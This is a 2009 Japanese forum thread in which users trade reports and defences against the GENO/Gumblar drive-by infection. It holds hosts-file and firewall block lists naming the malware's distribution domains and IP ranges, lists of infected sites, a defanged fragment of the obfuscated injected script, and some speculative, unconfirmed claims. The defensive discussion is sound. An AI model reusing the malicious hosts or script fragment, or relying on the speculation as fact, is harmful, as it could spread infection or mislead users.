ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
感染PCはゾンビ化して、ボットネットに組込まれるという情報もありますが
正確なことはわかっていません。
■再発防止策
・WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデート
・既知の危険サイト(今回の場合は、
http://www3.atword.jp/gnome/の焼却リスト参照 )を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、
PG2といったソフトのIPブロックで感染を回避する。
焼却リスト:
http://www3.atword.jp/gnome/2000/01/13/block-list/ 感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足 幾つかのサイトの告知ページ等では、セキュリティソフトベンダーを紹介しておりますが、 実際に稼動する本体は、ほとんど日替わりのように入れ替えられている為に、紹介されている セキュリティソフトにて「除去が行なえるとは言い切れません」。(というか多分無理です) 実際の動作を解析された方の報告によると、一定時間毎に自己を複製して古いものを 自己消滅させて捕捉を困難にする挙動のようですし、現時点では、感染後に元の環境に 戻すことのできるセキュリティソフトは確認できていません。 また、感染ファイルの除去を行なっても、ランダムな文字列でWindowsのレジストリ等を 変更してしまっているなど、原状復帰には至りません。閲覧者向けに告知される場合は、 セキュリティソフトベンダーのを紹介するよりも、PCのリカバリを推奨するのが 良いのではないかと思われます。 以上、要件のみにて失礼致します。
(サイト管理者ではなく、レンタルサーバーなどのドメインの管理者宛の場合、下記を頭につける)
ご担当者さま
御社管理下のIP「〜」に開設されているホームページ
「
http:// 〜」において、閲覧者のPCに第三者の
サーバーからマルウェア(コンピュータウイルス)をダウンロードさせる
攻撃スクリプトが挿入されていることを確認しました。
該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
連絡先のメールアドレスを見付けることができませんでした。
管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
閲覧するだけで感染する形で被害が広がっており、他の御社顧客の中にも
同様の危険を放置しているケースがあるかもしれません。そちらも併せて
ご確認いただければと思います。
攻撃スクリプトは、Avast!のJS:Redirector-H〜JS:Redirector-H9、
SophosのTroj/JSRedir-Rという名称で検出可能なようですので、
御社顧客のサイトを一通りチェックして頂けると有難いです。
他のセキュリティベンダーでは、危険ファイルをダウンロードする
第三者のサーバーIPをFWでのブロック対象にする形で対応している
ようですので、この攻撃スクリプトは検出されないようです。
−−−−−
>該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
>連絡先のメールアドレスを見付けることができませんでした。
>管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
ここを、対応をお願いします…だけでもいいかも。
同人の方でXP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の 環境で感染したって報告あったけど防ぎようがないじゃんもうこれ
361 :報告 :2009/05/18(月) 10:38:34 ID:Efl7GhePO (略) そして自分も只今クリーンインストール中 XP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の 環境で感染しました ジャバスク切りに失敗してたのが原因かも知れません アホすぐる ■sqlsodbc.chmサイズ変更確認 ■cmd.exe、regedit.exeは起動した ■白紙のPDFファイルが一気に10個以上開いてCPU使用率\(^o^)/オワタ ■Windows Updateに接続できない 一応自分の環境ではこういう症状が出ました (後略) だってさ
>>822 その人はJavaScript無効になってなかったと言ってたような
誰かPV数の多いたれこみ可能サイトへ情報投稿したらどうだろう? スラドとかITmediaとかGigazineとか。
>>822 SP2なところがダメダメな気がしますが
>Avast導入
スクリプトがすり抜けるケースも報告されており、過信はできません。
また、5/14に攻撃サイトのドメインが変更されており、すり抜けが増えている可能性があります。
>IP遮断済
最新の martuz.cn を遮断IPに加えていなかったか、設定が間違っていた可能性が高いです。
>Adobeリーダー・フラッシュプレイヤー最新
PDF、SWF以外にexeも落ちてくるんですが…exeの実行手法がわかりませんけど。
IP遮断してもって、文字通りだとしたら、どういうことよw リスト全く増えねぇなwジャンル報告だかは普通にあるのにな
>>823 が本当なら、テキはAdobeの脆弱性で未公表のものをいくつかストックしている可能性があるってことか。
新規脆弱性の波状ゼロデイ攻撃でGENOウイルスを散布されたらシャレにならん。
ひょっとしたらpdfが開くのだって「まだAdobeの脆弱性をつかってますよー」ってう偽装で、本当は
他の脆弱性を使ってるかもしれないし。
なんてことだ
>>826 やっぱexeに引っかかったってことかー
exeを実行させるってことはJS必須?JSオフで画像でも可?
あんまりスキル無いから感染サイト捜索打ち切った方が良いかな。
数個しか見つけれなんだ。役に立たなくてすまん。皆は頑張ってくれ
>>823 Avast導入 → 何時導入?定義更新は自動任せ?
IP遮断済 → 何時導入?
Adobeリーダー・フラッシュプレイヤー最新 → 何時更新?
この辺が判らんと感染してから更新or対策した可能性が否定できんのでなんとも。
相手さん改良続いてるから他の脆弱性突いてきてる可能性も否定できんし、こりゃ困ったもんだのう…
あくまでも未確認情報だから確定事項みたいに書かないように気をつけろよ。 と他の板から見に来てる人に書いておく。
>>828 スクリプトのID全部落ちてこないことも多いから、Adobe以外の脆弱性を
突いてる可能性は十分あるよな。
GENOウイルス注意喚起の記事書いたらいつもの10倍のアクセスになった件 そんなつもりで書いたわけじゃないのに
197 名前: スイセン(dion軍)[sage] 投稿日:2009/05/18(月) 10:14:34.01 ID:sn4Pmcsx ちょっと聞いてくれ 当方、評価用にWindows7(not Virtual XP)を運用しているんだが 試しに当該感染URLを踏んでみたら全然無害でした。 無害どころか、AppLockerとBitLockerのおかげでプロセスに乗せないよう 遮断してくれました。 ただし、これも評価用で入れたNorton 360 3.0 Betaは無反応でしたw
>>829 画像&MIME改変のケースもあるよ。IEでは8未満は画像ファイルを
実行しちゃうっぽい。
>>835 だから、「現時点では」 Windows2000/XP以外のOSはバージョンチェックではねてるんだってば。
リストに同人サーチ上げた人、リンク繋がってるよ
>>810-811 ありがとう
…別のウィルスに感染してんのか…
svchst.exeとか一文字違いなのが紛らわしい
しかもユーザー名出てて一瞬イきかけた
>>836 ・IEを使う場合は下記を設定
・信頼できるSite以外ではスクリプトやActiveXを切る
:インターネットオプションのセキュリティの部分で設定可能
・偽装jpg対策(IE6SP2以降限定。IE6SP1以前では出来ない)
:インターネットオプション→セキュリティ→レベルのカスタマイズ
→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする
avastいれたんだが、なんか必要な設定とかある? 情弱ですまんお
思いついたんだけど、検体集め&レポーターさん達で 自力で検体作成ってのは無理なんかね? 適当にFTPで非公開サイト作ってワザと感染すれば 色んな検体が集めれるんじゃとか思ったんだけど。ダメ?
>>838 すいません、まちがえました。
こちらで削除できないので管理人さまお手数お掛けしますが
削除お願いいたします。
おはヨーグルト 烏骨鶏はまだ放置だな
そだ、
>>1 の
>・再起動時にBSOD
踏んでもならなかったなーと思ってたんだが、(すぐにOS入れなおしたけど)
www3.atword.jp/gnome/の中の人の実験によると、再起動時に、IP遮断していると発生するとのこと。
>あと、 BSoD になる理由が判明
>ユーザ認証直後に 95.129.145.57 へ何らかのアクセスに失敗すると・・・?
>強引に explorer.exeをクラッシュさせてる様子
>
>これってアレだ・・
> 下手にIPブロックすると起動できなくなる・・
> 起動するためには IP情報、その他を抜かれるという・・・
>
>どこまでいやらしいんだオマエハ・・・・
>>843 それが駄目なんだな。
IP変えつつアクセスしないといけないし、どうもサイトごと?に
バラまくものの傾向があって、同じものばかり落ちてくる。
ほぼ同時刻に別サイトで拾うと別のものが落ちてくる。
ドメイン名かIPアドレスかなんかをキーに送り込むファイルを
自動生成してるのかもしれない。
>>841 同人板からですまないが
389 GENO ◆AbjB8MStDM sage New! 2009/05/18(月) 11:00:57 ID:4tM/xy9HO
>>1 報告ってか提案なんだけど、あばすと使いとかでFW入れてない人用に
フリーのFWの紹介載っけてみたらどうだろう
やりすぎかな?
とりあえず自分はコモドのFW導入したので、コモドのまとめWikiどうぞ
つ
http://www4.atwiki.jp/comodopf/ 自分もavast使いだから入れてみたよ
今の所軽くて快適
>>307 うちもよく同じ症状になる(JAVA無効)
これを機にマジでNokia機を買おうかな WM機がメインのネット端末だとかなり不安だ
>>850 入れただけだとほぼ無意味だけど大丈夫?
Defense+で防御してくれる場合もあるけど、何も設定しないと
ばんばん通信を許可していくよ。
ビビリな俺はnonscriptで全ページプラグイン禁止 リーダーはアンインスコ 一時的JS有効の時もフラッシュは切られてる状態 気休めかなあ 動画サイトはどうしようもないけど・・・
もう同人板の連中なんてほっとけ! なんて言ってられないからな・・・そこから広がると目も当てられないから。
これが疫病とかなら言う事聞かなくても村を隔離する、で済むんだがなw
>>854 IPリストの人のブログ参照して片っ端からIP入れたよ
これでいいんだよね?
>>859 とりあえずはOK。
ブロックするべきIP範囲もドメインもころころ変わるというか増えていく
可能性が高いけど。
>>795 ブログでこの下のサイト2個にリンクしてもいいですか?
>>856 気分的にはほっときたいけどそうも言ってられんねw
同人板で「同人サイトなんてヒット数が少ないから影響も少ないはずなのに何故晒す必要があるの?」と言ってた人がいたけど
ヒット数が少なくてもねずみ算式で増えていくし、しかもその数が多いから対象を把握できないことにはどうしようもない
サイト管理者も低スキル、観閲者は更にひどい状況で対策が期待出来ないこともある
>>861 それ誤爆レスなんだけどなぁ(・ω・`;)
自分は自分のサイトとブログにリンクしたけど、特に問題は起こってないから
リンクしちゃっても大丈夫なんじゃないかな?
まぁ、自分の場合はねらーだってサイトでバレてるのもあるだろうけど
>>857 ナカーマ。気休めなのかなー。
IP増えてもドメインそのままなら有効だからお得
とか思ったんだが。
同人板の元になったノウハウ板のスレの方にリンク集貼られてた。
協力的とまでは言えないがそれでも同人以外で見つけた時とか
一応協力できそうな場合はリンク集に放り込んでくれるってさ。
貼った人の書き方もあるだろうけど向こうは穏やかだった。
感染しても活動的なとこならすぐ対処しちゃうわけでなかなか難しいんだな
(){e●val(unes●cape(('Sc●ript(t,'●%')))})(/./●g); avast!ってこれに反応するのね
>>845 さっき更新して、そこで調べたらOKでした
ありがとう
>>863 ありがとう。遠慮なくさせていただきます。
>>855 さらにビビリな人はcookieSafeとか使って、cookieも許可制にしておく。
普通に手動で設定もできるけどcookiesafeだとステータスバーとかからボタン押すだけなので設定が楽。
クッキー設定は常に高だぜ。 クッキー要のところでしょっちゅう躓いてるわorz
>>861 初心者まとめの方の管理者です。
あまりねらっぽくないように作ったつもりなので(ギコナビとか見えるけど)リンクしても大丈夫だと思います。
不安を煽るような文章がないかどうか、分かりにくいところなどがありましたら連絡よろしくお願いします。
hostsファイルは#出始まるのはコメント扱いになるんですよね? てことは自分でわかるようにメモ書きしても大丈夫ですか # GENOウイルス対策5月18日 127.0.0.1 zlkon.lv 127.0.0.1 gumblar.cn 127.0.0.1 martuz.cn
>>871 うん
それと127.0.0.1より0.0.0.0の方が精神衛生上安全じゃね
>>875 3つとも入れた方が安全だけど
そんな事より JavaScript(flash) を切っとくべき
最新で安全か分からんし
ただいま産業
難読化スクリプトにに google Chrome は除外するように書いてあるんですね 怪しいサイトをgoogleに自動送信されるのを避けるためか?
とりあえずブラウズする場合は火狐にNoscript入れときゃいい話だろ? そこまであわてる話じゃない
>>875 現在使用されているのは martuz.cn なので、それだけ入ってればいい。
前の2つはおまじない。
またドメイン変更される可能性は十分あるし、(無いとは思うが)前の名前に戻される可能性もあるので
履歴みたいなもんだが、のこしといていいよ。実害ないし。
感染していないPCなら、最低限これやっとけば今の所は安心。 ・Windows Update(Microsoft Update)をして、システムを最新の状態にする。 ・Adobe Reader を最新(9.1.1)にするか、アンインストールする。 最新にした場合→[編集(E)] -> [環境設定(N)...] -> [JavaScript] -> [Acrobat JavaScript を使用(J)]のチェックを外す。 ・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。 ・ブラウザを Firefox に統一し、NoScript(アドオン)を導入する。 (もしくは、[ツール(T)] -> [オプション(O)...] -> [コンテンツ] -> [JavaScript を有効にする(J)]のチェックを外す。 ・C:\WINDOWS\system32\drivers\etc にある hosts ファイルに以下を追加 # GENOウイルス対策5月18日 0.0.0.0 zlkon.lv 0.0.0.0 gumblar.cn 0.0.0.0 martuz.cn
>>881 烏骨鶏と出版社には連絡できたのでしょうか?
未だに放置されてるようなので
ここはやっぱまったりしてんな
感染サイトを拾っていて気付いたこと。 <body>とか<BODY>だと、スクリプトが挿入されているが、<BODY bgcolor=#dddddd>のように記載されている ページに限っては、感染者のサイトであってもスクリプトが挿入されていない。 まかりまちがって気づかないうちに感染した時対策のおまじないとしてはありかもしれん。 phpとかjsも使ってるページだと、おまじないのしようがないけど。
他スレへの注意喚起コピペ用を作成してみました。
>>884 連絡は入れてあるけど、担当者が読んだかどうかは知らない。
(出版社は、アドレスわからなかったので、サーバー管理者の方のabuse窓口に送った)
>>886 訂正…ごめん、そのおまじない無効だわ。その形式でも入ってるページあった。orz
>>881 cnドメインって20円くらいらしいから、どんどん増殖するんだろうな。
hosts書き換えはお手軽でいいんだけど、以前拾ったスクリプトでは
IPが書き込まれてるものもあったから、hostsだけだと安心できない
んだよね。
>>888 お手数かけました、ありがとうございます。
最近はお年寄りもインターネットで買い物するようになってきましたが
セキュリティに関しては全く分からないという方が多いと思います。
それで早くサイトを修正してもらわないと、感染者がますます増える気がして
心配しています。
>>891 >2009/05/16の朝海外サイトからの攻撃で
海外サイトからの攻撃で。確かにウイルスの入手が自分でも
攻撃と言えば攻撃だが、なんかこうモヤモヤするな
あれ?ソース見る限りまだ直ってないみたいだけど……
チェッカーでは0%
Opera での flash の切り方 ・F12叩く → JavaScriptかプラグインを無効にする ・plugin-ignore.ini(C:\Program Files\Opera\defaults\) を開いて以下を追加 NPSWF32.dll = flash flash だけ切りたい人は下、そうでない人は上の方法で
# GENOウイルス対策5月18日 0.0.0.0 zlkon.lv 0.0.0.0 gumblar.cn 0.0.0.0 martuz.cn これをそのままコピペすればいいんですか? hostsファイル中開いたら既にえらいたくさん指定してあったんですが 一番下に付け加えればいいんでしょうか
ああ、キャッシュ見てたわ これは失敬
>>894 キャッシュ見てるんじゃない?
ソース見てきたけど、それっぽいのなかったですが
>>896 findyourbigwhy.cn
bigtopsuper.cn
このへんもhostsにつっこむべきかなあ
>>901 自分はhostsへの書き込み方解んない初心者に近いから
とりあえずFWへ突っ込んどいたよ
これから一応htaccessにも記入するとこ
>>898 127.0.0.1 localhost の下でいいよ
seibidoshuppan の件 WebARENA Suite 担当者より返答。 >現在の状況、およびウイルスの対策につきまして該当ホームページの >管理者さまへは連絡をさせて頂き、改善のご検討並びにご対応をいただいております。
>>902 うーん
いっそ .cnを全部遮断したい
>903 ありがとうございます
【緊急】ウイルス感染について2009年5月16日 投稿者: 雪町灯之助 sprnv。xii。jp/ doris。xii。jp/ から始まるURLにアクセスなさらないようによろしくお願いいたします。
ファイアウォールの設定よりhostsのがよほどわかりやすいと思うけどなぁ 突っ込めば遮断なんて死ぬほど明解
>>905 ネトゲ関係で垢ハック流行ってるから中国韓国台湾はデフォで全部弾いてるな(PG2利用)
(スクリプト確認:管理者にメール済み) p://www■geocities■jp/themusasi/ p://www■geocities■jp/themusasi2/ (同じ管理者と思われるがスクリプトなし) p://www■geocities■jp/themusasi2de/ p://www■geocities■jp/themusasi4/ (他のスレで感染サイトとして出ていたが、スクリプト見当たらず。ガセ) p://zaq■ne■jp p://okwave■jp/qa1152486■html
>>908 FWとhostsは全く別物だけどな
hostsは遮断してる訳じゃないだろ
>>907 上、接続失敗
下、ウイルス横行の為閉鎖中。閉鎖告知にはスクリプトなし。
>>908 IP遮断:ドメイン名で書かれていても、IPの数字でも遮断する。
DDNSなどで、ドメイン名に割当てられているIPが変化すると、同じ名前のサイトでもブロックできないことがある。
hosts:DNSサーバーより優先して参照され、ドメイン→IPへの変換を行なう。
登録してあれば、該当サイトの代わりに自PC(もしくは登録してある別のIP)を見に行くようになる。
安全のためには、両方設定しておくのが基本。
>>909 (・∀・)人(・∀・)ナカーマ
>>909 マジか
.cnなんて普通要らないし設定してこようかな
>>911 ルーティングされないから、遮断と一緒だよ。
FWと原理は違うけど。
>>883 zlkon.lv時代はIPで投下されていたから
hostsへの記載は無駄な気もする。
>>908 ワイルドカード使えないのがな…。example.comを書いても
foo.example.comやbar.example.comは阻止できない。
検証の方、乙です。 自分のノートパソコンもどうやら餌食になってしまったみたいなので、 現在バックアップとってリカバリー準備中です。 大分落ち着いてきたぞ!
確かにIPレベルで通信されたらhostsに書いてても意味無いね。 FWで止める方が確実か。
hosts fw ルータ の3段で防げばかなり強固
921 :
192.168.0.774 :2009/05/18(月) 13:53:48 ID:XBZCbjSj0
.cn全弾きってできないの?
こんな方法もある。 route -p add 95.129.144.0 mask 255.255.254.0 127.0.0.1
>>920 その三段構えが鉄板だね。こまめにメンテしなきゃ意味無いけどw
924 :
604 :2009/05/18(月) 14:02:44 ID:1VMrtiIH0
ウィンドウズモバイルで怪しいサイト踏むって言ってた者だけど
http://genolists.alink.uic.to/ にあるサイト片っ端から行ってみた。
結果
とりあえず問題ないっぽいが、接続切ってブラウザ閉じた後に2回ほど携帯が勝手に接続しようとして失敗した旨のエラーメッセージ確認。
携帯自身のエラーなのかウィルスなのかわからんのでなんともいえん。
ウィンドウズOSの入った機械でアクセスするのは控えたほうがいいかもしれん。
皆さんの協力感謝です。
あと、仮眠とった後PCにWin7をクリーンインスコ&イーモバイルで再接続したからID変わってるかも
これで自分の人柱報告は終わろうと思います。
FWはZoomAlearmでおk?
>>922 ルーティングテーブルか、その方法もあったな
>>926 この方法なら、とりあえずソフトいらないよ。
adobe readerのアップデートが8.15で最新になるんですが 最新版は9ですよね?
>>928 8 系の最新は、8.1.5
9 系の最新は、9.1.1
どちらも、セキュリティホールはつぶれているので安心してOK
うちはDNSサーバにダミーエントリいれて、サブドメインごとまとめてブロックした zone "zlkon.lv" { type master; file "zone\block.zone"; }; zone "gumblar.cn" { type master; file "zone\block.zone"; }; zone "martuz.cn" { type master; file "zone\block.zone"; };
Adobe Flash Playerがアップデートできないんですが これはアップデート時はActiveXやJavaScriptを有効にしないといけないんでしょうか
これ、本当かね?
あとで検証してみるか。
671 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 14:15:47 ID:
>>617 これVMで踏んでみたけど、確かに軽くなってるし、コマンドプロンプトも
レジストリエディタも立ち上がる。
chmファイルはなにやら更新されていく。
>>931 自前のDNSサーバーを持ってるってこと?
>>931 微妙にスレチだが・・・
file "/dev/null"; でOK
>>936 でも、zoneファイルで逆引きを定義しておかないとhosts書くのと
大差ない気がする。
こういう騒動がある度に覗くけど お前らすげえな素人の俺にはさっぱりだ
>>938 hosts も DNS も正引きは同じだからね。
DNS は、逆引きも設定できるけど。
IP アドレスで指定されたら、DNS やドメインによる制御は役に
たたないから、ルーティングとかF/Wで 95.129.144.0/23 への
アクセスを止めてしまった方が、現在のところは有効な気がする。
ただ、接続先IP変える位なら簡単に出来るだろうから、 どちらにしても、しばらく情報収集して無いと怖いね。
一般に役に立たないレスは控えた方がいいじゃないか DNSサーバーで対策なんて普通ありえんw
今日初めてhostsを知った情弱の俺でも、hostsをいじる事ができた。 これはPC詳しくない人間にはやりやすい対策かもしれないね。
>>942 逆に、ヤバ気なところを片っ端から登録したDNSを立てて、
それを使ってもらうというのもありかもしれん。
って、たぶんgnome氏が「身内」に提供してるのがまさに
そういうもんなんだろうな。
>>943 XPは簡単にできるけれどVistaはアクセス権がらみで手軽に書き換えられないよ
hosts煽ったのなんて広告ブロック以来だ
>>944 それ、身内ならいいだろうけど、怖くて使う気になれないと思うんだがw
誘導され放題w
Vista使いだけど、普段は一般ユーザーで使ってるから、ウイルスやワームにやられても システム書き換えられないようにしてる hostsファイル書き換えるときは、「メモ帳」を管理者権限で起動して、hostsファイル開いて書き換える
>>944 インターネット上で匿名のだれかがそんなサービス提供してたら、
逆にYahooやGoogleアクセスしたらウイルス感染サイトのIPアドレスに誘導されるかもわからん
>>945 こんなんでどうだろう。
Vistaでhostsを編集する方法
スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック
「管理者として実行」を選択
「ファイル」メニュー→「開く」
ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更
C:\Windows\System32\drivers\etc\hosts
を開く
以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
>>947 確かにそうだなw
そのDNSがやられたら一蓮托生だし。
955 :
不安な初心者 :2009/05/18(月) 14:50:14 ID:duvNIOfD0
皆さんに質問。テンプレセキュリティサイトの焼却炉の数字をPG2に登録したんですけど 焼却炉の数字を数字を登録するでGENO対策になってますよね?
p://park17■wakwak■com/~kitagawadaisuke/ 感染を確認。HP管理者の連絡先不明のため、サーバー管理者に連絡済み。
85.214.90.254 これどうするかなぁ・・独り言 めんどくさいから全焼きしとくか 85.214.16.0 - 85.214.139.255 85.214.0.0/16
>>955 リストとしてきちんと登録されていれば現状は対策になっていると思うよ
XP SP3遣いっす。 不安なんで教えてください。 C:\WINDOWS\system32\drivers\etcにあるhostファイルの最後に #090518 zlkon, GENO malware 127.0.0.1 zlkon.lv 127.0.0.1 gumblar.cn 127.0.0.1 gumlar.cn 127.0.0.1 martuz.cn 127.0.0.1 findyourbigwhy.cn 127.0.0.1 bigtopsuper.cn を追加しときました。 これでhostsファイルはおっけーですか?
>>951 ありがとう!
昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな!」
と
泣いていい?
>>454 それ英語版ファイルだから無問題ってことで俺の中では脳内変換されてる。
>>469 俺のVista機だと
日本語50727バイト
英語46133バイト
>>960 なんかよくわからんが、存分に泣くがいい。
>>954 普段は一般ユーザーで利用、DEPは全アプリでオン、IE8は保護モード動作、と一通りやってますよ
>>963-967 みんな ありがとう
本当に優しいな
俺、検証も人柱もできないけど、これだけは言いたい
mixiに書いちゃだめ
おー ウイルスリンク集続々と集まってるね 俺も帰ったらサブPCで怪しいとこ特攻するわ 同人は東方とボーカロイドが特に危ないんだよな?
今までセキュリティはソフトにおまかせだけだったので、先人の皆さんに感謝です。
>>2 の1.から4.までは比較的楽にできました。
「5.危険IPのブロック」はレスを参考に以下のようにやってみました。
hostsに3つのドメインを127.0.0.1で入れ、さらにIPでもはじくようにと思い、
ググってリンクたどって一番分かりやすかったのが・・・
「Kaspersky Internet Security 2009 通信を遮断するアドレスを範囲指定する方法」
自分がカスペ最近使い始めたのもあるんですが、これを見ながら
94.229.64.0/20(zlkon.lvに割り当てられていた範囲)と
95.129.144.0/23(martuz.cnとgumblar.cnに割り当てられていた範囲)を
カスペにFW設定してみました。
findyourbigwhy.cnとbigtopsuper.cnはカスペでドメイン名のFW遮断設定だけしましたが、
IP範囲ではどういう設定すべきか、
>>957 さん同様考え中です。
>>969 誰だったらそういう奴らに広めてやるわ
やらないけど
>>968 あぁDNSサーバー使いの人だったのですか
レスを読み返すと対策はかなり完璧じゃないですか
同人サイトって、同人誌出してるような絵描きのサイトのことなのか?
>>957 allow 85.214.0.0/20
deny 85.214.0.0/16
ってポリシーでどう?
>>5 カスペでも検知できるって聞いたんだけどavastの方がいいの?
979 :
192.168.0.774 :2009/05/18(月) 15:27:45 ID:jXgQJsa10
デルのPC XPで感染してしまったようです。 再インストールしたかったのですが、セットアップ途中で反応無し デルのサポートセンターの答えは、HD故障の疑いで現在検査中 1時間くらい掛かるということでしたが、5時間半経過でまだ56% 感染&HD故障がたまたま重なったと言うことなのでしょうか?
>>977 の訂正
allow 85.214.0.0/20
allow 85.214.240.0/20
deny 85.214.0.0/16
さっきから最新?のGenoを飼ってるんだけど、
>>401 あたりからの情報通り、
普通にオペレーションできてしまう。
qlsodbc.chm以外にわかりやすい判定方法がないぞ、これ。
しばらく動かしたままにしてるんだけど、サイズは1,323バイトのまま変化せず。
中身はASCIIテキストで謎の文字列。
サイズが変わったとかハッシュがどうこうではなく、chmファイルをダブルクリック
して開けなければ感染してる。
別のVMで他のサイトから感染させてみて、文字列が変わるかどうか調べてみるか。
FTPしないとサイズ変わらないのかな。 どこかの anonymous サーバにテストFTPしてみるとかどうだろう?
>>980 トロイの木馬が使用するプロトコルとポート番号を(例外ルールで通信の許可)設定した場合は防げないってことでは?
ファイル共有などで誤って、トロイの木馬ポートを許可設定した場合だと思うけれどどうだろう
ちょwwwwwww手ぶろ感染ってまじ?wwwwwww
p://pmpk■dojin■com 感染報告のメールに対し、対応完了の返答あり。完了してるかの確認まではやってない。
genoに感染、再起動後にregeditを起動しようとしてもエクスプローラー再起動みたくなって 起動できないけど regedit.exeをa.exeのような適当な名前に変えて実行すると正常に起動できる その後、ファイル名を元のregedit.exeに戻しても普通に起動できるようになった
>>983 それはやってる。別のVMのftpサーバにアクセスしたけど、変わらない。
sniffingツール等の有無を確認して動作を停止してしまうのかもしれない。
あるいはデバイスを見てVMで実行していることを検知して動作を停止して
いるのかも。
妙に軽く動くのは、このウィルス本来の動作を行っていないからという
可能性がある。
とりあえずすっぴんのVMで試してみて、駄目ならネットブックでも
使ってみようかと。
>>986 パンプキン日記内のgenoスクリプト消し忘れているようだ
>>984 俺も処理を「許可」にした場合はってことだと思うんだけど
サポートの不慣れな姉さんはトロイの木馬は防げませんの一点張りw
じゃあなんのための設定なのかとwww
>>988 >デバイスを見てVMで実行していることを検知して
さらりと怖いこと言うね
>>993 そっか。ってことは別種なのかな。こっちはregeditもExplorerもcmd.exeも
普通に動く。
>>994 実際、ラボでの検証をすり抜けるために、VM特有のデバドラをチェックする
ウィルスがあるらしいからねぇ。
手ブロが感染とは、どこのスレがソースですか
この件で何の役にも立たない俺だけど、次スレ立ててくるわ
>>996 情弱の同人板では問題ないと判断されてた
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。